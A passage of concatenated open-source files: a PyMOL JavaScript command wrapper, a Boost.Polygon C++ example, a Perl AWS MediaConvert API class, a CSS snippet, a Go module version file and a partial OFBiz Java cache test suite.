},\n update: function() {\n return this._dispatch.apply(this,\n [\"update\"].concat(Array.prototype.slice.apply(arguments)));\n },\n attach: function() {\n return this._dispatch.apply(this,\n [\"attach\"].concat(Array.prototype.slice.apply(arguments)));\n },\n bond: function() {\n return this._dispatch.apply(this,\n [\"bond\"].concat(Array.prototype.slice.apply(arguments)));\n },\n unbond: function() {\n return this._dispatch.apply(this,\n [\"unbond\"].concat(Array.prototype.slice.apply(arguments)));\n },\n cycle_valence: function() {\n return this._dispatch.apply(this,\n [\"cycle_valence\"].concat(Array.prototype.slice.apply(arguments)));\n },\n drag: function() {\n return this._dispatch.apply(this,\n [\"drag\"].concat(Array.prototype.slice.apply(arguments)));\n },\n dss: function() {\n return this._dispatch.apply(this,\n [\"dss\"].concat(Array.prototype.slice.apply(arguments)));\n },\n edit: function() {\n return this._dispatch.apply(this,\n [\"edit\"].concat(Array.prototype.slice.apply(arguments)));\n },\n unpick: function() {\n return this._dispatch.apply(this,\n [\"unpick\"].concat(Array.prototype.slice.apply(arguments)));\n },\n fix_chemistry: function() {\n return this._dispatch.apply(this,\n [\"fix_chemistry\"].concat(Array.prototype.slice.apply(arguments)));\n },\n flag: function() {\n return this._dispatch.apply(this,\n [\"flag\"].concat(Array.prototype.slice.apply(arguments)));\n },\n fuse: function() {\n return this._dispatch.apply(this,\n [\"fuse\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_editor_scheme: function() {\n return this._dispatch.apply(this,\n [\"get_editor_scheme\"].concat(Array.prototype.slice.apply(arguments)));\n },\n h_add: function() {\n return this._dispatch.apply(this,\n [\"h_add\"].concat(Array.prototype.slice.apply(arguments)));\n },\n h_fill: 
function() {\n return this._dispatch.apply(this,\n [\"h_fill\"].concat(Array.prototype.slice.apply(arguments)));\n },\n h_fix: function() {\n return this._dispatch.apply(this,\n [\"h_fix\"].concat(Array.prototype.slice.apply(arguments)));\n },\n invert: function() {\n return this._dispatch.apply(this,\n [\"invert\"].concat(Array.prototype.slice.apply(arguments)));\n },\n torsion: function() {\n return this._dispatch.apply(this,\n [\"torsion\"].concat(Array.prototype.slice.apply(arguments)));\n },\n valence: function() {\n return this._dispatch.apply(this,\n [\"valence\"].concat(Array.prototype.slice.apply(arguments)));\n },\n clean: function() {\n return this._dispatch.apply(this,\n [\"clean\"].concat(Array.prototype.slice.apply(arguments)));\n },\n deprotect: function() {\n return this._dispatch.apply(this,\n [\"deprotect\"].concat(Array.prototype.slice.apply(arguments)));\n },\n protect: function() {\n return this._dispatch.apply(this,\n [\"protect\"].concat(Array.prototype.slice.apply(arguments)));\n },\n reference: function() {\n return this._dispatch.apply(this,\n [\"reference\"].concat(Array.prototype.slice.apply(arguments)));\n },\n remove: function() {\n return this._dispatch.apply(this,\n [\"remove\"].concat(Array.prototype.slice.apply(arguments)));\n },\n remove_picked: function() {\n return this._dispatch.apply(this,\n [\"remove_picked\"].concat(Array.prototype.slice.apply(arguments)));\n },\n rename: function() {\n return this._dispatch.apply(this,\n [\"rename\"].concat(Array.prototype.slice.apply(arguments)));\n },\n replace: function() {\n return this._dispatch.apply(this,\n [\"replace\"].concat(Array.prototype.slice.apply(arguments)));\n },\n sculpt_purge: function() {\n return this._dispatch.apply(this,\n [\"sculpt_purge\"].concat(Array.prototype.slice.apply(arguments)));\n },\n sculpt_deactivate: function() {\n return this._dispatch.apply(this,\n [\"sculpt_deactivate\"].concat(Array.prototype.slice.apply(arguments)));\n },\n sculpt_activate: function() {\n return this._dispatch.apply(this,\n [\"sculpt_activate\"].concat(Array.prototype.slice.apply(arguments)));\n },\n sculpt_iterate: function() {\n return this._dispatch.apply(this,\n [\"sculpt_iterate\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_geometry: function() {\n return this._dispatch.apply(this,\n [\"set_geometry\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_symmetry: function() {\n return this._dispatch.apply(this,\n [\"set_symmetry\"].concat(Array.prototype.slice.apply(arguments)));\n },\n set_title: function() {\n return this._dispatch.apply(this,\n [\"set_title\"].concat(Array.prototype.slice.apply(arguments)));\n },\n smooth: function() {\n return this._dispatch.apply(this,\n [\"smooth\"].concat(Array.prototype.slice.apply(arguments)));\n },\n sort: function() {\n return this._dispatch.apply(this,\n [\"sort\"].concat(Array.prototype.slice.apply(arguments)));\n },\n undo: function() {\n return this._dispatch.apply(this,\n [\"undo\"].concat(Array.prototype.slice.apply(arguments)));\n },\n push_undo: function() {\n return this._dispatch.apply(this,\n [\"push_undo\"].concat(Array.prototype.slice.apply(arguments)));\n },\n redo: function() {\n return this._dispatch.apply(this,\n [\"redo\"].concat(Array.prototype.slice.apply(arguments)));\n },\n wizard: function() {\n return this._dispatch.apply(this,\n [\"wizard\"].concat(Array.prototype.slice.apply(arguments)));\n },\n replace_wizard: function() {\n return this._dispatch.apply(this,\n 
[\"replace_wizard\"].concat(Array.prototype.slice.apply(arguments)));\n },\n count_frames: function() {\n return this._dispatch.apply(this,\n [\"count_frames\"].concat(Array.prototype.slice.apply(arguments)));\n },\n count_states: function() {\n return this._dispatch.apply(this,\n [\"count_states\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mset: function() {\n return this._dispatch.apply(this,\n [\"mset\"].concat(Array.prototype.slice.apply(arguments)));\n },\n madd: function() {\n return this._dispatch.apply(this,\n [\"madd\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mclear: function() {\n return this._dispatch.apply(this,\n [\"mclear\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mmatrix: function() {\n return this._dispatch.apply(this,\n [\"mmatrix\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mdump: function() {\n return this._dispatch.apply(this,\n [\"mdump\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mview: function() {\n return this._dispatch.apply(this,\n [\"mview\"].concat(Array.prototype.slice.apply(arguments)));\n },\n forward: function() {\n return this._dispatch.apply(this,\n [\"forward\"].concat(Array.prototype.slice.apply(arguments)));\n },\n backward: function() {\n return this._dispatch.apply(this,\n [\"backward\"].concat(Array.prototype.slice.apply(arguments)));\n },\n rewind: function() {\n return this._dispatch.apply(this,\n [\"rewind\"].concat(Array.prototype.slice.apply(arguments)));\n },\n middle: function() {\n return this._dispatch.apply(this,\n [\"middle\"].concat(Array.prototype.slice.apply(arguments)));\n },\n ending: function() {\n return this._dispatch.apply(this,\n [\"ending\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mplay: function() {\n return this._dispatch.apply(this,\n [\"mplay\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mtoggle: function() {\n return this._dispatch.apply(this,\n [\"mtoggle\"].concat(Array.prototype.slice.apply(arguments)));\n },\n mstop: function() {\n return this._dispatch.apply(this,\n [\"mstop\"].concat(Array.prototype.slice.apply(arguments)));\n },\n frame: function() {\n return this._dispatch.apply(this,\n [\"frame\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_movie_playing: function() {\n return this._dispatch.apply(this,\n [\"get_movie_playing\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_state: function() {\n return this._dispatch.apply(this,\n [\"get_state\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_frame: function() {\n return this._dispatch.apply(this,\n [\"get_frame\"].concat(Array.prototype.slice.apply(arguments)));\n },\n view: function() {\n return this._dispatch.apply(this,\n [\"view\"].concat(Array.prototype.slice.apply(arguments)));\n },\n get_scene_list: function() {\n return this._dispatch.apply(this,\n [\"get_scene_list\"].concat(Array.prototype.slice.apply(arguments)));\n },\n scene: function() {\n return this._dispatch.apply(this,\n [\"scene\"].concat(Array.prototype.slice.apply(arguments)));\n },\n scene_order: function() {\n return this._dispatch.apply(this,\n [\"scene_order\"].concat(Array.prototype.slice.apply(arguments)));\n }\n\n // END MACHINE-GENERATED CODE\n\n }\n \n this.getattr = {\n dispatch: function(attrname) {\n if (attrname) {\n mypath = \"/getattr/pymol.\" + attrname;\n this._outer._send(mypath);\n }\n }\n // viewing: function() {\n // this._dispatch(\"viewing\");\n // }\n }\n\n // enable inner pseudo-inner-instance to find the outer instance\n\n 
this.cmd._outer = this\n this.getattr._outer = this\n}\n\n// utility functions not used above, but of use to some users, one hopes\nfunction parse_file(f) {\n var re = /[\\\\\\/]/;\n fields = f.split(re);\n filename = fields[fields.length-1];\n dot = filename.lastIndexOf('.');\n if (dot > -1) {\n name = filename.slice(0,dot);\n ext = filename.slice(dot);\n } else {\n name = filename;\n ext = \"\";\n }\n // Javascript 1.7+ only in Mozilla?\n // return [name, ext];\n return new Array(name, ext);\n}\nfunction validate_file(n,f) {\n if (f.value) {\n // Javascript 1.7+ only in Mozilla?\n // [name, ext] = parse_file(f.value);\n parsed = parse_file(f.value);\n name = parsed[0];\n ext = parsed[1];\n if (name) {\n n.value = name;\n //add_checkbox(name, \"objects\");\n return true;\n } else {\n alert('cannot extract name from file');\n return false;\n }\n } else {\n alert('no file selected');\n return false;\n }\n}\n"} {"text": "/*\nCopyright 2008 Intel Corporation\n\nUse, modification and distribution are subject to the Boost Software License,\nVersion 1.0. (See accompanying file LICENSE_1_0.txt or copy at\nhttp://www.boost.org/LICENSE_1_0.txt).\n*/\n#include \n#include \n#include \n#include \n#include \n#include \nnamespace gtl = boost::polygon;\nusing namespace boost::polygon::operators;\n\n//once again we make our usage of the library generic\n//and parameterize it on the polygon set type\ntemplate \nvoid test_polygon_set() {\n using namespace gtl;\n PolygonSet ps;\n ps += rectangle_data(0, 0, 10, 10);\n PolygonSet ps2;\n ps2 += rectangle_data(5, 5, 15, 15);\n PolygonSet ps3;\n assign(ps3, ps * ps2);\n PolygonSet ps4;\n ps4 += ps + ps2;\n assert(area(ps4) == area(ps) + area(ps2) - area(ps3));\n assert(equivalence((ps + ps2) - (ps * ps2), ps ^ ps2));\n rectangle_data rect;\n assert(extents(rect, ps ^ ps2));\n assert(area(rect) == 225);\n assert(area(rect ^ (ps ^ ps2)) == area(rect) - area(ps ^ ps2));\n}\n\n//first thing is first, lets include all the code from previous examples\n\n//the CPoint example\nstruct CPoint {\n int x;\n int y;\n};\n\nnamespace boost { namespace polygon {\n template <>\n struct geometry_concept { typedef point_concept type; };\n template <>\n struct point_traits {\n typedef int coordinate_type;\n\n static inline coordinate_type get(const CPoint& point,\n\t\t\t\t\torientation_2d orient) {\n\tif(orient == HORIZONTAL)\n\t return point.x;\n\treturn point.y;\n }\n };\n\n template <>\n struct point_mutable_traits {\n typedef int coordinate_type;\n\n static inline void set(CPoint& point, orientation_2d orient, int value) {\n\tif(orient == HORIZONTAL)\n\t point.x = value;\n\telse\n\t point.y = value;\n }\n static inline CPoint construct(int x_value, int y_value) {\n\tCPoint retval;\n\tretval.x = x_value;\n\tretval.y = y_value;\n\treturn retval;\n }\n };\n } }\n\n//the CPolygon example\ntypedef std::list CPolygon;\n\n//we need to specialize our polygon concept mapping in boost polygon\nnamespace boost { namespace polygon {\n //first register CPolygon as a polygon_concept type\n template <>\n struct geometry_concept{ typedef polygon_concept type; };\n\n template <>\n struct polygon_traits {\n typedef int coordinate_type;\n typedef CPolygon::const_iterator iterator_type;\n typedef CPoint point_type;\n\n // Get the begin iterator\n static inline iterator_type begin_points(const CPolygon& t) {\n\treturn t.begin();\n }\n\n // Get the end iterator\n static inline iterator_type end_points(const CPolygon& t) {\n\treturn t.end();\n }\n\n // Get the number of sides of the polygon\n static 
inline std::size_t size(const CPolygon& t) {\n\treturn t.size();\n }\n\n // Get the winding direction of the polygon\n static inline winding_direction winding(const CPolygon& t) {\n\treturn unknown_winding;\n }\n };\n\n template <>\n struct polygon_mutable_traits {\n //expects stl style iterators\n template \n static inline CPolygon& set_points(CPolygon& t,\n\t\t\t\t\t iT input_begin, iT input_end) {\n\tt.clear();\n\twhile(input_begin != input_end) {\n\t t.push_back(CPoint());\n\t gtl::assign(t.back(), *input_begin);\n\t ++input_begin;\n\t}\n\treturn t;\n }\n\n };\n } }\n\n//OK, finally we get to declare our own polygon set type\ntypedef std::deque CPolygonSet;\n\n//deque isn't automatically a polygon set in the library\n//because it is a standard container there is a shortcut\n//for mapping it to polygon set concept, but I'll do it\n//the long way that you would use in the general case.\nnamespace boost { namespace polygon {\n //first we register CPolygonSet as a polygon set\n template <>\n struct geometry_concept { typedef polygon_set_concept type; };\n\n //next we map to the concept through traits\n template <>\n struct polygon_set_traits {\n typedef int coordinate_type;\n typedef CPolygonSet::const_iterator iterator_type;\n typedef CPolygonSet operator_arg_type;\n\n static inline iterator_type begin(const CPolygonSet& polygon_set) {\n\treturn polygon_set.begin();\n }\n\n static inline iterator_type end(const CPolygonSet& polygon_set) {\n\treturn polygon_set.end();\n }\n\n //don't worry about these, just return false from them\n static inline bool clean(const CPolygonSet& polygon_set) { return false; }\n static inline bool sorted(const CPolygonSet& polygon_set) { return false; }\n };\n\n template <>\n struct polygon_set_mutable_traits {\n template \n static inline void set(CPolygonSet& polygon_set, input_iterator_type input_begin, input_iterator_type input_end) {\n\tpolygon_set.clear();\n\t//this is kind of cheesy. 
I am copying the unknown input geometry\n\t//into my own polygon set and then calling get to populate the\n\t//deque\n\tpolygon_set_data ps;\n\tps.insert(input_begin, input_end);\n\tps.get(polygon_set);\n\t//if you had your own odd-ball polygon set you would probably have\n\t//to iterate through each polygon at this point and do something\n\t//extra\n }\n };\n} }\n\nint main() {\n long long c1 = clock();\n for(int i = 0; i < 1000; ++i)\n test_polygon_set();\n long long c2 = clock();\n for(int i = 0; i < 1000; ++i)\n test_polygon_set >();\n long long c3 = clock();\n long long diff1 = c2 - c1;\n long long diff2 = c3 - c2;\n if(diff1 > 0 && diff2)\n std::cout << \"library polygon_set_data is \" << float(diff1)/float(diff2) << \"X faster than custom polygon set deque of CPolygon\" << std::endl;\n else\n std::cout << \"operation was too fast\" << std::endl;\n return 0;\n}\n\n//Now you know how to map your own data type to polygon set concept\n//Now you also know how to make your application code that operates on geometry\n//data type agnostic from point through polygon set\n"} {"text": "\npackage Paws::MediaConvert::GetJob;\n use Moose;\n has Id => (is => 'ro', isa => 'Str', traits => ['ParamInURI'], uri_name => 'id', required => 1);\n\n use MooseX::ClassAttribute;\n\n class_has _api_call => (isa => 'Str', is => 'ro', default => 'GetJob');\n class_has _api_uri => (isa => 'Str', is => 'ro', default => '/2017-08-29/jobs/{id}');\n class_has _api_method => (isa => 'Str', is => 'ro', default => 'GET');\n class_has _returns => (isa => 'Str', is => 'ro', default => 'Paws::MediaConvert::GetJobResponse');\n1;\n\n### main pod documentation begin ###\n\n=head1 NAME\n\nPaws::MediaConvert::GetJob - Arguments for method GetJob on L\n\n=head1 DESCRIPTION\n\nThis class represents the parameters used for calling the method GetJob on the\nL service. Use the attributes of this class\nas arguments to method GetJob.\n\nYou shouldn't make instances of this class. Each attribute should be used as a named argument in the call to GetJob.\n\n=head1 SYNOPSIS\n\n my $mediaconvert = Paws->service('MediaConvert');\n my $GetJobResponse = $mediaconvert->GetJob(\n Id => 'My__string',\n\n );\n\n # Results:\n my $Job = $GetJobResponse->Job;\n\n # Returns a L object.\n\nValues for attributes that are native types (Int, String, Float, etc) can passed as-is (scalar values). Values for complex Types (objects) can be passed as a HashRef. The keys and values of the hashref will be used to instance the underlying object.\nFor the AWS API documentation, see L\n\n=head1 ATTRIBUTES\n\n\n=head2 B Id => Str\n\nthe job ID of the job.\n\n\n\n\n=head1 SEE ALSO\n\nThis class forms part of L, documenting arguments for method GetJob in L\n\n=head1 BUGS and CONTRIBUTIONS\n\nThe source code is located here: L\n\nPlease report bugs to: L\n\n=cut\n\n"} {"text": ".label-success{\n font-size: 17;\n color: #18b58b;\n font-weight: 600;\n}\n\n.label-failed{\n font-size: 17;\n color: #fa0909;\n font-weight: 600;\n}\n\n.label-category{\n color: #606060;\n font-size: 15;\n}\n\n.user-name{\n padding-top:3;\n color:#616161;\n font-size: 17;\n}\n.label-score{\n color: #8c8c8c;\n font-size: 15;\n}\n\n.border-left{\n border-color: #dfdfdf;\n border-width: 0 2 0 0;\n border-style: dotted;\n width: 95%;\n height: 1;\n}"} {"text": "// Copyright 2019 The Go Authors. 
All rights reserved.\n// Use of this source code is governed by a BSD-style\n// license that can be found in the LICENSE file.\n\n// Package version records versioning information about this module.\npackage version\n\nimport (\n\t\"fmt\"\n\t\"strings\"\n)\n\n// These constants determine the current version of this module.\n//\n//\n// For our release process, we enforce the following rules:\n//\t* Tagged releases use a tag that is identical to String.\n//\t* Tagged releases never reference a commit where the String\n//\tcontains \"devel\".\n//\t* The set of all commits in this repository where String\n//\tdoes not contain \"devel\" must have a unique String.\n//\n//\n// Steps for tagging a new release:\n//\t1. Create a new CL.\n//\n//\t2. Update Minor, Patch, and/or PreRelease as necessary.\n//\tPreRelease must not contain the string \"devel\".\n//\n//\t3. Since the last released minor version, have there been any changes to\n//\tgenerator that relies on new functionality in the runtime?\n//\tIf yes, then increment RequiredGenerated.\n//\n//\t4. Since the last released minor version, have there been any changes to\n//\tthe runtime that removes support for old .pb.go source code?\n//\tIf yes, then increment SupportMinimum.\n//\n//\t5. Send out the CL for review and submit it.\n//\tNote that the next CL in step 8 must be submitted after this CL\n//\twithout any other CLs in-between.\n//\n//\t6. Tag a new version, where the tag is is the current String.\n//\n//\t7. Write release notes for all notable changes\n//\tbetween this release and the last release.\n//\n//\t8. Create a new CL.\n//\n//\t9. Update PreRelease to include the string \"devel\".\n//\tFor example: \"\" -> \"devel\" or \"rc.1\" -> \"rc.1.devel\"\n//\n//\t10. Send out the CL for review and submit it.\nconst (\n\tMajor = 1\n\tMinor = 23\n\tPatch = 0\n\tPreRelease = \"\"\n)\n\n// String formats the version string for this module in semver format.\n//\n// Examples:\n//\tv1.20.1\n//\tv1.21.0-rc.1\nfunc String() string {\n\tv := fmt.Sprintf(\"v%d.%d.%d\", Major, Minor, Patch)\n\tif PreRelease != \"\" {\n\t\tv += \"-\" + PreRelease\n\n\t\t// TODO: Add metadata about the commit or build hash.\n\t\t// See https://golang.org/issue/29814\n\t\t// See https://golang.org/issue/33533\n\t\tvar metadata string\n\t\tif strings.Contains(PreRelease, \"devel\") && metadata != \"\" {\n\t\t\tv += \"+\" + metadata\n\t\t}\n\t}\n\treturn v\n}\n"} {"text": "/*\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing,\n * software distributed under the License is distributed on an\n * \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n * KIND, either express or implied. 
See the License for the\n * specific language governing permissions and limitations\n * under the License.\n */\npackage org.apache.ofbiz.base.util.cache;\n\nimport static org.apache.ofbiz.base.test.GenericTestCaseBase.useAllMemory;\nimport static org.hamcrest.MatcherAssert.assertThat;\nimport static org.hamcrest.Matchers.containsInAnyOrder;\nimport static org.hamcrest.Matchers.greaterThan;\nimport static org.junit.Assert.assertEquals;\nimport static org.junit.Assert.assertFalse;\nimport static org.junit.Assert.assertNotSame;\nimport static org.junit.Assert.assertNull;\nimport static org.junit.Assert.assertSame;\nimport static org.junit.Assert.assertTrue;\n\nimport java.io.Serializable;\nimport java.util.Collections;\nimport java.util.HashMap;\nimport java.util.HashSet;\nimport java.util.Map;\nimport java.util.Objects;\nimport java.util.Set;\n\nimport org.apache.ofbiz.base.util.UtilMisc;\nimport org.apache.ofbiz.base.util.UtilObject;\nimport org.junit.Test;\n\n@SuppressWarnings(\"serial\")\npublic class UtilCacheTests implements Serializable {\n abstract static class Change {\n private int count = 1;\n\n public int getCount() {\n return count;\n }\n\n public void incCount() {\n count += 1;\n }\n }\n\n protected static final class Removal extends Change {\n private final V oldValue;\n\n protected Removal(V oldValue) {\n this.oldValue = oldValue;\n }\n\n @Override\n public int hashCode() {\n return UtilObject.doHashCode(oldValue);\n }\n\n @Override\n public boolean equals(Object o) {\n if (o instanceof Removal) {\n Removal other = (Removal) o;\n return Objects.equals(oldValue, other.oldValue);\n }\n return false;\n }\n }\n\n protected static final class Addition extends Change {\n private final V newValue;\n\n protected Addition(V newValue) {\n this.newValue = newValue;\n }\n\n @Override\n public int hashCode() {\n return UtilObject.doHashCode(newValue);\n }\n\n @Override\n public boolean equals(Object o) {\n if (o instanceof Addition) {\n Addition other = (Addition) o;\n return Objects.equals(newValue, other.newValue);\n }\n return false;\n }\n }\n\n protected static final class Update extends Change {\n private final V newValue;\n private final V oldValue;\n\n protected Update(V newValue, V oldValue) {\n this.newValue = newValue;\n this.oldValue = oldValue;\n }\n\n @Override\n public int hashCode() {\n return UtilObject.doHashCode(newValue) ^ UtilObject.doHashCode(oldValue);\n }\n\n @Override\n public boolean equals(Object o) {\n if (o instanceof Update) {\n Update other = (Update) o;\n if (!Objects.equals(newValue, other.newValue)) {\n return false;\n }\n return Objects.equals(oldValue, other.oldValue);\n }\n return false;\n }\n }\n\n private static final class Listener implements CacheListener {\n private Map> changeMap = new HashMap<>();\n\n private void add(K key, Change change) {\n Set changeSet = changeMap.get(key);\n if (changeSet == null) {\n changeSet = new HashSet<>();\n changeMap.put(key, changeSet);\n }\n for (Change checkChange: changeSet) {\n if (checkChange.equals(change)) {\n checkChange.incCount();\n return;\n }\n }\n changeSet.add(change);\n }\n\n @Override\n public synchronized void noteKeyRemoval(UtilCache cache, K key, V oldValue) {\n add(key, new Removal<>(oldValue));\n }\n\n @Override\n public synchronized void noteKeyAddition(UtilCache cache, K key, V newValue) {\n add(key, new Addition<>(newValue));\n }\n\n @Override\n public synchronized void noteKeyUpdate(UtilCache cache, K key, V newValue, V oldValue) {\n add(key, new Update<>(newValue, oldValue));\n }\n\n 
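// The tests below construct a second, 'wanted' Listener by invoking the\n        // note* callbacks directly with the events they expect, and then compare\n        // it to the listener actually registered on the cache; that comparison\n        // relies on the change-map equality defined by the equals() override\n        // that follows.\n        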
@Override\n public boolean equals(Object o) {\n if (!(o instanceof Listener)) {\n return false;\n }\n Listener other = (Listener) o;\n return changeMap.equals(other.changeMap);\n }\n\n @Override\n public int hashCode() {\n return super.hashCode();\n }\n }\n\n private static Listener createListener(UtilCache cache) {\n Listener listener = new Listener<>();\n cache.addListener(listener);\n return listener;\n }\n\n private UtilCache createUtilCache(int sizeLimit, int maxInMemory, long ttl, boolean useSoftReference) {\n return UtilCache.createUtilCache(getClass().getName(), sizeLimit, maxInMemory, ttl, useSoftReference);\n }\n\n private static void assertUtilCacheSettings(UtilCache cache, Integer sizeLimit, Integer maxInMemory,\n Long expireTime, Boolean useSoftReference) {\n if (sizeLimit != null) {\n assertEquals(cache.getName() + \":sizeLimit\", sizeLimit.intValue(), cache.getSizeLimit());\n }\n if (maxInMemory != null) {\n assertEquals(cache.getName() + \":maxInMemory\", maxInMemory.intValue(), cache.getMaxInMemory());\n }\n if (expireTime != null) {\n assertEquals(cache.getName() + \":expireTime\", expireTime.longValue(), cache.getExpireTime());\n }\n if (useSoftReference != null) {\n assertEquals(cache.getName() + \":useSoftReference\", useSoftReference.booleanValue(),\n cache.getUseSoftReference());\n }\n assertEquals(\"initial empty\", true, cache.isEmpty());\n assertEquals(\"empty keys\", Collections.emptySet(), cache.getCacheLineKeys());\n assertEquals(\"empty values\", Collections.emptyList(), cache.values());\n assertSame(\"find cache\", cache, UtilCache.findCache(cache.getName()));\n assertNotSame(\"new cache\", cache, UtilCache.createUtilCache());\n }\n\n @Test\n public void testCreateUtilCache() {\n String name = getClass().getName();\n assertUtilCacheSettings(UtilCache.createUtilCache(), null, null, null, null);\n assertUtilCacheSettings(UtilCache.createUtilCache(name), null, null, null, null);\n assertUtilCacheSettings(UtilCache.createUtilCache(name, false), null, null, null, Boolean.FALSE);\n assertUtilCacheSettings(UtilCache.createUtilCache(name, true), null, null, null, Boolean.TRUE);\n assertUtilCacheSettings(UtilCache.createUtilCache(5, 15000), 5, null, 15000L, null);\n assertUtilCacheSettings(UtilCache.createUtilCache(name, 6, 16000), 6, null, 16000L, null);\n assertUtilCacheSettings(UtilCache.createUtilCache(name, 7, 17000, false), 7, null, 17000L, Boolean.FALSE);\n assertUtilCacheSettings(UtilCache.createUtilCache(name, 8, 18000, true), 8, null, 18000L, Boolean.TRUE);\n assertUtilCacheSettings(UtilCache.createUtilCache(name, 9, 5, 19000, false), 9, 5, 19000L, Boolean.FALSE);\n assertUtilCacheSettings(UtilCache.createUtilCache(name, 10, 6, 20000, false), 10, 6, 20000L, Boolean.FALSE);\n assertUtilCacheSettings(\n UtilCache.createUtilCache(name, 11, 7, 21000, false, \"a\", \"b\"), 11, 7, 21000L, Boolean.FALSE);\n assertUtilCacheSettings(\n UtilCache.createUtilCache(name, 12, 8, 22000, false, \"c\", \"d\"), 12, 8, 22000L, Boolean.FALSE);\n }\n\n public static void assertKey(String label, UtilCache cache, K key, V value, V other, int size,\n Map map) {\n assertNull(label + \":get-empty\", cache.get(key));\n assertFalse(label + \":containsKey-empty\", cache.containsKey(key));\n V oldValue = cache.put(key, other);\n assertTrue(label + \":containsKey-class\", cache.containsKey(key));\n assertEquals(label + \":get-class\", other, cache.get(key));\n assertNull(label + \":oldValue-class\", oldValue);\n assertEquals(label + \":size-class\", size, cache.size());\n oldValue = 
cache.put(key, value);\n assertTrue(label + \":containsKey-value\", cache.containsKey(key));\n assertEquals(label + \":get-value\", value, cache.get(key));\n assertEquals(label + \":oldValue-value\", other, oldValue);\n assertEquals(label + \":size-value\", size, cache.size());\n map.put(key, value);\n assertEquals(label + \":map-keys\", map.keySet(), cache.getCacheLineKeys());\n assertThat(label + \":map-values\", cache.values(), containsInAnyOrder(map.values().toArray()));\n }\n\n private static void assertHasSingleKey(UtilCache cache, K key, V value) {\n assertFalse(\"is-empty\", cache.isEmpty());\n assertEquals(\"size\", 1, cache.size());\n assertTrue(\"found\", cache.containsKey(key));\n assertTrue(\"validKey\", UtilCache.validKey(cache.getName(), key));\n assertFalse(\"validKey\", UtilCache.validKey(\":::\" + cache.getName(), key));\n assertEquals(\"get\", value, cache.get(key));\n assertEquals(\"keys\", new HashSet<>(UtilMisc.toList(key)), cache.getCacheLineKeys());\n assertEquals(\"values\", UtilMisc.toList(value), cache.values());\n }\n\n private static void assertNoSingleKey(UtilCache cache, K key) {\n assertFalse(\"not-found\", cache.containsKey(key));\n assertFalse(\"validKey\", UtilCache.validKey(cache.getName(), key));\n assertNull(\"no-get\", cache.get(key));\n assertNull(\"remove\", cache.remove(key));\n assertTrue(\"is-empty\", cache.isEmpty());\n assertEquals(\"size\", 0, cache.size());\n assertEquals(\"keys\", Collections.emptySet(), cache.getCacheLineKeys());\n assertEquals(\"values\", Collections.emptyList(), cache.values());\n }\n\n private static void basicTest(UtilCache cache) throws Exception {\n Listener gotListener = createListener(cache);\n Listener wantedListener = new Listener<>();\n for (int i = 0; i < 2; i++) {\n assertTrue(\"UtilCacheTable.keySet\", UtilCache.getUtilCacheTableKeySet().contains(cache.getName()));\n assertSame(\"UtilCache.findCache\", cache, UtilCache.findCache(cache.getName()));\n assertSame(\"UtilCache.getOrCreateUtilCache\", cache, UtilCache.getOrCreateUtilCache(cache.getName(),\n cache.getSizeLimit(), cache.getMaxInMemory(), cache.getExpireTime(), cache.getUseSoftReference()));\n\n assertNoSingleKey(cache, \"one\");\n long origByteSize = cache.getSizeInBytes();\n\n wantedListener.noteKeyAddition(cache, null, \"null\");\n assertNull(\"put\", cache.put(null, \"null\"));\n assertHasSingleKey(cache, null, \"null\");\n long nullByteSize = cache.getSizeInBytes();\n assertThat(nullByteSize, greaterThan(origByteSize));\n\n wantedListener.noteKeyRemoval(cache, null, \"null\");\n assertEquals(\"remove\", \"null\", cache.remove(null));\n assertNoSingleKey(cache, null);\n\n wantedListener.noteKeyAddition(cache, \"one\", \"uno\");\n assertNull(\"put\", cache.put(\"one\", \"uno\"));\n assertHasSingleKey(cache, \"one\", \"uno\");\n long unoByteSize = cache.getSizeInBytes();\n assertThat(unoByteSize, greaterThan(origByteSize));\n\n wantedListener.noteKeyUpdate(cache, \"one\", \"single\", \"uno\");\n assertEquals(\"replace\", \"uno\", cache.put(\"one\", \"single\"));\n assertHasSingleKey(cache, \"one\", \"single\");\n long singleByteSize = cache.getSizeInBytes();\n assertThat(singleByteSize, greaterThan(origByteSize));\n assertThat(singleByteSize, greaterThan(unoByteSize));\n\n wantedListener.noteKeyRemoval(cache, \"one\", \"single\");\n assertEquals(\"remove\", \"single\", cache.remove(\"one\"));\n assertNoSingleKey(cache, \"one\");\n assertEquals(\"byteSize\", origByteSize, cache.getSizeInBytes());\n\n wantedListener.noteKeyAddition(cache, \"one\", 
